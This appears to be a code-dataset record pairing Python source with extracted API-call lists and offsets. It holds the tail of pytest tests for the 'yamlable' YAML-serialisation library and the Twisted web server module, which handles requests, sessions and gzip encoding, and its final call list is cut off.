FooLegacy(**dct) # instantiate f = FooLegacy(1, 'hello') # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooLegacy a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooLegacy.loads_yaml(y) # load io assert f == FooLegacy.load_yaml(StringIO(y)) # load pyyaml assert f == load(y) assert enc assert dec # TODO override so that tag is not supported, to check error message def test_yamlable_not_supported(): @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Err(YamlAble): # __yaml_tag_suffix__ = 'foo' not needed: we used @yaml_info def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) def __to_yaml_dict__(self): # type: (...) -> Dict[str, Any] return copy(vars(self)) @classmethod def __from_yaml_dict__(cls, # type: Type[Y] dct, # type: Dict[str, Any] yaml_tag # type: str ): # type: (...) -> Y return Foo_Err(**dct) @classmethod def is_yaml_tag_supported(cls, yaml_tag # type: str ): # type: (...) -> bool # ALWAYS return false return False with pytest.raises(TypeError) as err_info: Foo_Err.loads_yaml("!yamlable/yaml.tests.Foo_Err {a: 1, b: hello}\n") assert "No YamlAble subclass found able to decode object" in str(err_info.value) def test_yamlable_default_impl(): """ tests that the default implementation works """ @yaml_info(yaml_tag_ns='yaml.tests') class Foo_Default(YamlAble): def __init__(self, a, b): self.a = a self.b = b f = Foo_Default(1, 'hello') s = """!yamlable/yaml.tests.Foo_Default a: 1 b: hello """ assert dump(f, default_flow_style=False) == s assert dump(load(dump(load(s))), default_flow_style=False) == s def test_help_yaml_info(): @yaml_info("com.example.MyFoo") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.MyFoo" @yaml_info(yaml_tag_ns="com.example") class Foo(YamlAble): pass assert Foo.__yaml_tag_suffix__ == "com.example.Foo" assert Foo().dumps_yaml() == """!yamlable/com.example.Foo {} """ def test_abstract_parent_error(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooE(YamlAble): pass class FooError(AbstractFooE): """ This class inherits from the parent without redefining a yaml tag """ def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate e = FooError(1, 'hello') # dump with pytest.raises(NotImplementedError): e.dumps_yaml() def test_abstract_parent(): """This tests that we can define an abstract parent class with the YamlAble behaviour and inherit it""" class AbstractFooV(YamlAble): pass @yaml_info(yaml_tag_ns='yaml.tests') class FooValid(AbstractFooV): def __init__(self, a, b): self.a = a self.b = b def __eq__(self, other): return vars(self) == vars(other) # instantiate f = FooValid(1, 'hello') # note: # dump y = f.dumps_yaml(default_flow_style=False) assert y == """!yamlable/yaml.tests.FooValid a: 1 b: hello """ # dump io class MemorizingStringIO(StringIO): """ A StringIO object that memorizes its buffer when it is closed (as opposed to the standard StringIO) """ def close(self): self.value = self.getvalue() # super(StringIO, self).close() # this does not work with python 2 old-style classes (StringIO is one) StringIO.close(self) s = MemorizingStringIO() f.dump_yaml(s, default_flow_style=False) assert s.value == y # dump pyyaml assert dump(f, default_flow_style=False) == y # load assert f == FooValid.loads_yaml(y) # load io assert f == FooValid.load_yaml(StringIO(y)) # load pyyaml assert f == load(y)
[ "yaml.dump", "yaml.load", "pytest.raises", "io.StringIO.close", "io.StringIO", "yamlable.yaml_info" ]
[((1534, 1569), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (1543, 1569), False, 'from yamlable import YamlAble, yaml_info\n'), ((3261, 3296), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (3270, 3296), False, 'from yamlable import YamlAble, yaml_info\n'), ((5081, 5116), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (5090, 5116), False, 'from yamlable import YamlAble, yaml_info\n'), ((6338, 6373), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (6347, 6373), False, 'from yamlable import YamlAble, yaml_info\n'), ((6736, 6766), 'yamlable.yaml_info', 'yaml_info', (['"""com.example.MyFoo"""'], {}), "('com.example.MyFoo')\n", (6745, 6766), False, 'from yamlable import YamlAble, yaml_info\n'), ((6870, 6906), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""com.example"""'}), "(yaml_tag_ns='com.example')\n", (6879, 6906), False, 'from yamlable import YamlAble, yaml_info\n'), ((7876, 7911), 'yamlable.yaml_info', 'yaml_info', ([], {'yaml_tag_ns': '"""yaml.tests"""'}), "(yaml_tag_ns='yaml.tests')\n", (7885, 7911), False, 'from yamlable import YamlAble, yaml_info\n'), ((721, 755), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (734, 755), False, 'import pytest\n'), ((2914, 2947), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (2918, 2947), False, 'from yaml import dump, load\n'), ((3092, 3099), 'yaml.load', 'load', (['y'], {}), '(y)\n', (3096, 3099), False, 'from yaml import dump, load\n'), ((4740, 4773), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (4744, 4773), False, 'from yaml import dump, load\n'), ((4930, 4937), 'yaml.load', 'load', (['y'], {}), '(y)\n', (4934, 4937), False, 'from yaml import dump, load\n'), ((6038, 6062), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (6051, 6062), False, 'import pytest\n'), ((6593, 6626), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (6597, 6626), False, 'from yaml import dump, load\n'), ((7625, 7659), 'pytest.raises', 'pytest.raises', (['NotImplementedError'], {}), '(NotImplementedError)\n', (7638, 7659), False, 'import pytest\n'), ((8805, 8838), 'yaml.dump', 'dump', (['f'], {'default_flow_style': '(False)'}), '(f, default_flow_style=False)\n', (8809, 8838), False, 'from yaml import dump, load\n'), ((8993, 9000), 'yaml.load', 'load', (['y'], {}), '(y)\n', (8997, 9000), False, 'from yaml import dump, load\n'), ((2764, 2784), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (2778, 2784), False, 'from io import StringIO\n'), ((3044, 3055), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (3052, 3055), False, 'from io import StringIO\n'), ((4590, 4610), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (4604, 4610), False, 'from io import StringIO\n'), ((4882, 4893), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (4890, 4893), False, 'from io import StringIO\n'), ((8655, 8675), 'io.StringIO.close', 'StringIO.close', (['self'], {}), '(self)\n', (8669, 8675), False, 'from io import StringIO\n'), ((8945, 8956), 'io.StringIO', 'StringIO', (['y'], {}), '(y)\n', (8953, 8956), False, 'from io import StringIO\n'), ((6659, 6666), 'yaml.load', 'load', (['s'], {}), '(s)\n', (6663, 6666), False, 'from yaml import dump, load\n')]
# -*- test-case-name: twisted.web.test.test_web -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This is a web server which integrates with the twisted.internet infrastructure. @var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render} implementations can return to indicate that the application will later call C{.write} and C{.finish} to complete the request, and that the HTTP connection should be left open. @type NOT_DONE_YET: Opaque; do not depend on any particular type for this value. """ import copy import os import re from html import escape from typing import List, Optional from urllib.parse import quote as _quote import zlib from binascii import hexlify from zope.interface import implementer from twisted.python.compat import networkString, nativeString from twisted.spread.pb import Copyable, ViewPoint from twisted.internet import address, interfaces from twisted.internet.error import AlreadyCalled, AlreadyCancelled from twisted.web import iweb, http, util from twisted.web.http import unquote from twisted.python import reflect, failure, components from twisted import copyright from twisted.web import resource from twisted.web.error import UnsupportedMethod from incremental import Version from twisted.python.deprecate import deprecatedModuleAttribute from twisted.logger import Logger NOT_DONE_YET = 1 __all__ = [ "supportedMethods", "Request", "Session", "Site", "version", "NOT_DONE_YET", "GzipEncoderFactory", ] # backwards compatibility deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.datetimeToString instead", "twisted.web.server", "date_time_string", ) deprecatedModuleAttribute( Version("Twisted", 12, 1, 0), "Please use twisted.web.http.stringToDatetime instead", "twisted.web.server", "string_date_time", ) date_time_string = http.datetimeToString string_date_time = http.stringToDatetime # Support for other methods may be implemented on a per-resource basis. supportedMethods = (b"GET", b"HEAD", b"POST") def quote(string, *args, **kwargs): return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap") def _addressToTuple(addr): if isinstance(addr, address.IPv4Address): return ("INET", addr.host, addr.port) elif isinstance(addr, address.UNIXAddress): return ("UNIX", addr.name) else: return tuple(addr) @implementer(iweb.IRequest) class Request(Copyable, http.Request, components.Componentized): """ An HTTP request. @ivar defaultContentType: A L{bytes} giving the default I{Content-Type} value to send in responses if no other value is set. L{None} disables the default. @ivar _insecureSession: The L{Session} object representing state that will be transmitted over plain-text HTTP. @ivar _secureSession: The L{Session} object representing the state that will be transmitted only over HTTPS. """ defaultContentType = b"text/html" site = None appRootURL = None prepath: Optional[List[bytes]] = None postpath: Optional[List[bytes]] = None __pychecker__ = "unusednames=issuer" _inFakeHead = False _encoder = None _log = Logger() def __init__(self, *args, **kw): http.Request.__init__(self, *args, **kw) components.Componentized.__init__(self) def getStateToCopyFor(self, issuer): x = self.__dict__.copy() del x["transport"] # XXX refactor this attribute out; it's from protocol # del x['server'] del x["channel"] del x["content"] del x["site"] self.content.seek(0, 0) x["content_data"] = self.content.read() x["remote"] = ViewPoint(issuer, self) # Address objects aren't jellyable x["host"] = _addressToTuple(x["host"]) x["client"] = _addressToTuple(x["client"]) # Header objects also aren't jellyable. x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders()) return x # HTML generation helpers def sibLink(self, name): """ Return the text that links to a sibling of the requested resource. @param name: The sibling resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ if self.postpath: return (len(self.postpath) * b"../") + name else: return name def childLink(self, name): """ Return the text that links to a child of the requested resource. @param name: The child resource @type name: C{bytes} @return: A relative URL. @rtype: C{bytes} """ lpp = len(self.postpath) if lpp > 1: return ((lpp - 1) * b"../") + name elif lpp == 1: return name else: # lpp == 0 if len(self.prepath) and self.prepath[-1]: return self.prepath[-1] + b"/" + name else: return name def gotLength(self, length): """ Called when HTTP channel got length of content in this request. This method is not intended for users. @param length: The length of the request body, as indicated by the request headers. L{None} if the request headers do not indicate a length. """ try: getContentFile = self.channel.site.getContentFile except AttributeError: http.Request.gotLength(self, length) else: self.content = getContentFile(length) def process(self): """ Process a request. Find the addressed resource in this request's L{Site}, and call L{self.render()<Request.render()>} with it. @see: L{Site.getResourceFor()} """ # get site from channel self.site = self.channel.site # set various default headers self.setHeader(b"server", version) self.setHeader(b"date", http.datetimeToString()) # Resource Identification self.prepath = [] self.postpath = list(map(unquote, self.path[1:].split(b"/"))) # Short-circuit for requests whose path is '*'. if self.path == b"*": self._handleStar() return try: resrc = self.site.getResourceFor(self) if resource._IEncodingResource.providedBy(resrc): encoder = resrc.getEncoder(self) if encoder is not None: self._encoder = encoder self.render(resrc) except BaseException: self.processingFailed(failure.Failure()) def write(self, data): """ Write data to the transport (if not responding to a HEAD request). @param data: A string to write to the response. @type data: L{bytes} """ if not self.startedWriting: # Before doing the first write, check to see if a default # Content-Type header should be supplied. We omit it on # NOT_MODIFIED and NO_CONTENT responses. We also omit it if there # is a Content-Length header set to 0, as empty bodies don't need # a content-type. needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT) contentType = self.responseHeaders.getRawHeaders(b"content-type") contentLength = self.responseHeaders.getRawHeaders(b"content-length") contentLengthZero = contentLength and (contentLength[0] == b"0") if ( needsCT and contentType is None and self.defaultContentType is not None and not contentLengthZero ): self.responseHeaders.setRawHeaders( b"content-type", [self.defaultContentType] ) # Only let the write happen if we're not generating a HEAD response by # faking out the request method. Note, if we are doing that, # startedWriting will never be true, and the above logic may run # multiple times. It will only actually change the responseHeaders # once though, so it's still okay. if not self._inFakeHead: if self._encoder: data = self._encoder.encode(data) http.Request.write(self, data) def finish(self): """ Override C{http.Request.finish} for possible encoding. """ if self._encoder: data = self._encoder.finish() if data: http.Request.write(self, data) return http.Request.finish(self) def render(self, resrc): """ Ask a resource to render itself. If the resource does not support the requested method, generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response. @param resrc: The resource to render. @type resrc: L{twisted.web.resource.IResource} @see: L{IResource.render()<twisted.web.resource.IResource.render()>} """ try: body = resrc.render(self) except UnsupportedMethod as e: allowedMethods = e.allowedMethods if (self.method == b"HEAD") and (b"GET" in allowedMethods): # We must support HEAD (RFC 2616, 5.1.1). If the # resource doesn't, fake it by giving the resource # a 'GET' request and then return only the headers, # not the body. self._log.info( "Using GET to fake a HEAD request for {resrc}", resrc=resrc ) self.method = b"GET" self._inFakeHead = True body = resrc.render(self) if body is NOT_DONE_YET: self._log.info( "Tried to fake a HEAD request for {resrc}, but " "it got away from me.", resrc=resrc, ) # Oh well, I guess we won't include the content length. else: self.setHeader(b"content-length", b"%d" % (len(body),)) self._inFakeHead = False self.method = b"HEAD" self.write(b"") self.finish() return if self.method in (supportedMethods): # We MUST include an Allow header # (RFC 2616, 10.4.6 and 14.7) self.setHeader(b"Allow", b", ".join(allowedMethods)) s = ( """Your browser approached me (at %(URI)s) with""" """ the method "%(method)s". I only allow""" """ the method%(plural)s %(allowed)s here.""" % { "URI": escape(nativeString(self.uri)), "method": nativeString(self.method), "plural": ((len(allowedMethods) > 1) and "s") or "", "allowed": ", ".join([nativeString(x) for x in allowedMethods]), } ) epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s) body = epage.render(self) else: epage = resource.ErrorPage( http.NOT_IMPLEMENTED, "Huh?", "I don't know how to treat a %s request." % (escape(self.method.decode("charmap")),), ) body = epage.render(self) # end except UnsupportedMethod if body is NOT_DONE_YET: return if not isinstance(body, bytes): body = resource.ErrorPage( http.INTERNAL_SERVER_ERROR, "Request did not return bytes", "Request: " + util._PRE(reflect.safe_repr(self)) + "<br />" + "Resource: " + util._PRE(reflect.safe_repr(resrc)) + "<br />" + "Value: " + util._PRE(reflect.safe_repr(body)), ).render(self) if self.method == b"HEAD": if len(body) > 0: # This is a Bad Thing (RFC 2616, 9.4) self._log.info( "Warning: HEAD request {slf} for resource {resrc} is" " returning a message body. I think I'll eat it.", slf=self, resrc=resrc, ) self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(b"") else: self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() def processingFailed(self, reason): """ Finish this request with an indication that processing failed and possibly display a traceback. @param reason: Reason this request has failed. @type reason: L{twisted.python.failure.Failure} @return: The reason passed to this method. @rtype: L{twisted.python.failure.Failure} """ self._log.failure("", failure=reason) if self.site.displayTracebacks: body = ( b"<html><head><title>web.Server Traceback" b" (most recent call last)</title></head>" b"<body><b>web.Server Traceback" b" (most recent call last):</b>\n\n" + util.formatFailure(reason) + b"\n\n</body></html>\n" ) else: body = ( b"<html><head><title>Processing Failed" b"</title></head><body>" b"<b>Processing Failed</b></body></html>" ) self.setResponseCode(http.INTERNAL_SERVER_ERROR) self.setHeader(b"content-type", b"text/html") self.setHeader(b"content-length", b"%d" % (len(body),)) self.write(body) self.finish() return reason def view_write(self, issuer, data): """Remote version of write; same interface.""" self.write(data) def view_finish(self, issuer): """Remote version of finish; same interface.""" self.finish() def view_addCookie(self, issuer, k, v, **kwargs): """Remote version of addCookie; same interface.""" self.addCookie(k, v, **kwargs) def view_setHeader(self, issuer, k, v): """Remote version of setHeader; same interface.""" self.setHeader(k, v) def view_setLastModified(self, issuer, when): """Remote version of setLastModified; same interface.""" self.setLastModified(when) def view_setETag(self, issuer, tag): """Remote version of setETag; same interface.""" self.setETag(tag) def view_setResponseCode(self, issuer, code, message=None): """ Remote version of setResponseCode; same interface. """ self.setResponseCode(code, message) def view_registerProducer(self, issuer, producer, streaming): """Remote version of registerProducer; same interface. (requires a remote producer.) """ self.registerProducer(_RemoteProducerWrapper(producer), streaming) def view_unregisterProducer(self, issuer): self.unregisterProducer() ### these calls remain local _secureSession = None _insecureSession = None @property def session(self): """ If a session has already been created or looked up with L{Request.getSession}, this will return that object. (This will always be the session that matches the security of the request; so if C{forceNotSecure} is used on a secure request, this will not return that session.) @return: the session attribute @rtype: L{Session} or L{None} """ if self.isSecure(): return self._secureSession else: return self._insecureSession def getSession(self, sessionInterface=None, forceNotSecure=False): """ Check if there is a session cookie, and if not, create it. By default, the cookie with be secure for HTTPS requests and not secure for HTTP requests. If for some reason you need access to the insecure cookie from a secure request you can set C{forceNotSecure = True}. @param forceNotSecure: Should we retrieve a session that will be transmitted over HTTP, even if this L{Request} was delivered over HTTPS? @type forceNotSecure: L{bool} """ # Make sure we aren't creating a secure session on a non-secure page secure = self.isSecure() and not forceNotSecure if not secure: cookieString = b"TWISTED_SESSION" sessionAttribute = "_insecureSession" else: cookieString = b"TWISTED_SECURE_SESSION" sessionAttribute = "_secureSession" session = getattr(self, sessionAttribute) if session is not None: # We have a previously created session. try: # Refresh the session, to keep it alive. session.touch() except (AlreadyCalled, AlreadyCancelled): # Session has already expired. session = None if session is None: # No session was created yet for this request. cookiename = b"_".join([cookieString] + self.sitepath) sessionCookie = self.getCookie(cookiename) if sessionCookie: try: session = self.site.getSession(sessionCookie) except KeyError: pass # if it still hasn't been set, fix it up. if not session: session = self.site.makeSession() self.addCookie(cookiename, session.uid, path=b"/", secure=secure) setattr(self, sessionAttribute, session) if sessionInterface: return session.getComponent(sessionInterface) return session def _prePathURL(self, prepath): port = self.getHost().port if self.isSecure(): default = 443 else: default = 80 if port == default: hostport = "" else: hostport = ":%d" % port prefix = networkString( "http%s://%s%s/" % ( self.isSecure() and "s" or "", nativeString(self.getRequestHostname()), hostport, ) ) path = b"/".join([quote(segment, safe=b"") for segment in prepath]) return prefix + path def prePathURL(self): return self._prePathURL(self.prepath) def URLPath(self): from twisted.python import urlpath return urlpath.URLPath.fromRequest(self) def rememberRootURL(self): """ Remember the currently-processed part of the URL for later recalling. """ url = self._prePathURL(self.prepath[:-1]) self.appRootURL = url def getRootURL(self): """ Get a previously-remembered URL. @return: An absolute URL. @rtype: L{bytes} """ return self.appRootURL def _handleStar(self): """ Handle receiving a request whose path is '*'. RFC 7231 defines an OPTIONS * request as being something that a client can send as a low-effort way to probe server capabilities or readiness. Rather than bother the user with this, we simply fast-path it back to an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed telling the client they can only use OPTIONS. """ if self.method == b"OPTIONS": self.setResponseCode(http.OK) else: self.setResponseCode(http.NOT_ALLOWED) self.setHeader(b"Allow", b"OPTIONS") # RFC 7231 says we MUST set content-length 0 when responding to this # with no body. self.setHeader(b"Content-Length", b"0") self.finish() @implementer(iweb._IRequestEncoderFactory) class GzipEncoderFactory: """ @cvar compressLevel: The compression level used by the compressor, default to 9 (highest). @since: 12.3 """ _gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])") compressLevel = 9 def encoderForRequest(self, request): """ Check the headers if the client accepts gzip encoding, and encodes the request if so. """ acceptHeaders = b",".join( request.requestHeaders.getRawHeaders(b"accept-encoding", []) ) if self._gzipCheckRegex.search(acceptHeaders): encoding = request.responseHeaders.getRawHeaders(b"content-encoding") if encoding: encoding = b",".join(encoding + [b"gzip"]) else: encoding = b"gzip" request.responseHeaders.setRawHeaders(b"content-encoding", [encoding]) return _GzipEncoder(self.compressLevel, request) @implementer(iweb._IRequestEncoder) class _GzipEncoder: """ An encoder which supports gzip. @ivar _zlibCompressor: The zlib compressor instance used to compress the stream. @ivar _request: A reference to the originating request. @since: 12.3 """ _zlibCompressor = None def __init__(self, compressLevel, request): self._zlibCompressor = zlib.compressobj( compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS ) self._request = request def encode(self, data): """ Write to the request, automatically compressing data on the fly. """ if not self._request.startedWriting: # Remove the content-length header, we can't honor it # because we compress on the fly. self._request.responseHeaders.removeHeader(b"content-length") return self._zlibCompressor.compress(data) def finish(self): """ Finish handling the request request, flushing any data from the zlib buffer. """ remain = self._zlibCompressor.flush() self._zlibCompressor = None return remain class _RemoteProducerWrapper: def __init__(self, remote): self.resumeProducing = remote.remoteMethod("resumeProducing") self.pauseProducing = remote.remoteMethod("pauseProducing") self.stopProducing = remote.remoteMethod("stopProducing") class Session(components.Componentized): """ A user's session with a system. This utility class contains no functionality, but is used to represent a session. @ivar site: The L{Site} that generated the session. @type site: L{Site} @ivar uid: A unique identifier for the session. @type uid: L{bytes} @ivar _reactor: An object providing L{IReactorTime} to use for scheduling expiration. @ivar sessionTimeout: Time after last modification the session will expire, in seconds. @type sessionTimeout: L{float} @ivar lastModified: Time the C{touch()} method was last called (or time the session was created). A UNIX timestamp as returned by L{IReactorTime.seconds()}. @type lastModified: L{float} """ sessionTimeout = 900 _expireCall = None def __init__(self, site, uid, reactor=None): """ Initialize a session with a unique ID for that session. @param reactor: L{IReactorTime} used to schedule expiration of the session. If C{None}, the reactor associated with I{site} is used. """ super().__init__() if reactor is None: reactor = site.reactor self._reactor = reactor self.site = site self.uid = uid self.expireCallbacks = [] self.touch() self.sessionNamespaces = {} def startCheckingExpiration(self): """ Start expiration tracking. @return: L{None} """ self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire) def notifyOnExpire(self, callback): """ Call this callback when the session expires or logs out. """ self.expireCallbacks.append(callback) def expire(self): """ Expire/logout of the session. """ del self.site.sessions[self.uid] for c in self.expireCallbacks: c() self.expireCallbacks = [] if self._expireCall and self._expireCall.active(): self._expireCall.cancel() # Break reference cycle. self._expireCall = None def touch(self): """ Mark the session as modified, which resets expiration timer. """ self.lastModified = self._reactor.seconds() if self._expireCall is not None: self._expireCall.reset(self.sessionTimeout) version = networkString(f"TwistedWeb/{copyright.version}") @implementer(interfaces.IProtocolNegotiationFactory) class Site(http.HTTPFactory): """ A web site: manage log, sessions, and resources. @ivar requestFactory: A factory which is called with (channel) and creates L{Request} instances. Default to L{Request}. @ivar displayTracebacks: If set, unhandled exceptions raised during rendering are returned to the client as HTML. Default to C{False}. @ivar sessionFactory: factory for sessions objects. Default to L{Session}. @ivar sessions: Mapping of session IDs to objects returned by C{sessionFactory}. @type sessions: L{dict} mapping L{bytes} to L{Session} given the default C{sessionFactory} @ivar counter: The number of sessions that have been generated. @type counter: L{int} @ivar sessionCheckTime: Deprecated and unused. See L{Session.sessionTimeout} instead. """ counter = 0 requestFactory = Request displayTracebacks = False sessionFactory = Session sessionCheckTime = 1800 _entropy = os.urandom def __init__(self, resource, requestFactory=None, *args, **kwargs): """ @param resource: The root of the resource hierarchy. All request traversal for requests received by this factory will begin at this resource. @type resource: L{IResource} provider @param requestFactory: Overwrite for default requestFactory. @type requestFactory: C{callable} or C{class}. @see: L{twisted.web.http.HTTPFactory.__init__} """ super().__init__(*args, **kwargs) self.sessions = {} self.resource = resource if requestFactory is not None: self.requestFactory = requestFactory def _openLogFile(self, path): from twisted.python import logfile return logfile.LogFile(os.path.basename(path), os.path.dirname(path)) def __getstate__(self): d = self.__dict__.copy() d["sessions"] = {} return d def _mkuid(self): """ (internal) Generate an opaque, unique ID for a user's session. """ self.counter = self.counter + 1 return hexlify(self._entropy(32)) def makeSession(self): """ Generate a new Session instance, and store it for future reference. """ uid = self._mkuid() session = self.sessions[uid] = self.sessionFactory(self, uid) session.startCheckingExpiration() return session def getSession(self, uid): """ Get a previously generated session. @param uid: Unique ID of the session. @type uid: L{bytes}. @raise KeyError: If the session is not found. """ return self.sessions[uid] def buildProtocol(self, addr): """ Generate a channel attached to this site. """ channel = super().buildProtocol(addr) channel.requestFactory = self.requestFactory channel.site = self return channel isLeaf = 0 def render(self, request): """ Redirect because a Site is always a directory. """ request.redirect(request.prePathURL() + b"/") request.finish() def getChildWithDefault(self, pathEl, request): """ Emulate a resource's getChild method. """ request.site = self return self.resource.getChildWithDefault(pathEl, request) def getResourceFor(self, request): """ Get a resource for a request. This iterates through the resource hierarchy, calling getChildWithDefault on each resource it finds for a path element, stopping when it hits an element where isLeaf is true. """ request.site = self # Sitepath is used to determine cookie names between distributed # servers and disconnected sites. request.sitepath = copy.copy(request.prepath) return resource.getChildForRequest(self.resource, request) # IProtocolNegotiationFactory def acceptableProtocols(self): """ Protocols this server can speak. """ baseProtocols = [b"http/1.1"] if http.H2_ENABLED: baseProtocols.insert(0, b"h2") return baseProtocols
[ "twisted.python.components.Componentized.__init__", "twisted.python.urlpath.URLPath.fromRequest", "re.compile", "twisted.logger.Logger", "twisted.web.resource.getChildForRequest", "twisted.web.http.Request.gotLength", "copy.copy", "zlib.compressobj", "twisted.web.resource._IEncodingResource.providedBy", "twisted.spread.pb.ViewPoint", "incremental.Version", "os.path.dirname", "twisted.python.failure.Failure", "twisted.python.compat.nativeString", "twisted.python.reflect.safe_repr", "twisted.web.http.Request.finish", "twisted.web.resource.ErrorPage", "zope.interface.implementer", "twisted.web.http.datetimeToString", "twisted.python.compat.networkString", "twisted.web.http.Request.__init__", "os.path.basename", "twisted.web.util.formatFailure", "twisted.web.http.Request.write" ]
[((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\n', (2493, 2508), False, 'from zope.interface import implementer\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\n', (20329, 20359), False, 'from zope.interface import implementer\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\n', (21331, 21354), False, 'from zope.interface import implementer\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f"""TwistedWeb/{copyright.version}"""'], {}), "(f'TwistedWeb/{copyright.version}')\n", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\n', (25255, 25295), False, 'from zope.interface import implementer\n'), ((1605, 1633), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1612, 1633), False, 'from incremental import Version\n'), ((1778, 1806), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1785, 1806), False, 'from incremental import Version\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\n', (3300, 3302), False, 'from twisted.logger import Logger\n'), ((20546, 20589), 're.compile', 're.compile', (["b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])'"], {}), "(b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])')\n", (20556, 20589), False, 'import re\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\n', (19063, 19069), False, 'from twisted.python import urlpath\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\n', (21724, 21775), False, 'import zlib\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\n', (29177, 29194), False, 'import copy\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\n', (29237, 29261), False, 'from twisted.web import resource\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\n', (6515, 6522), False, 'from twisted.web import resource\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (27120, 27126), False, 'import os\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (27143, 27149), False, 'import os\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', 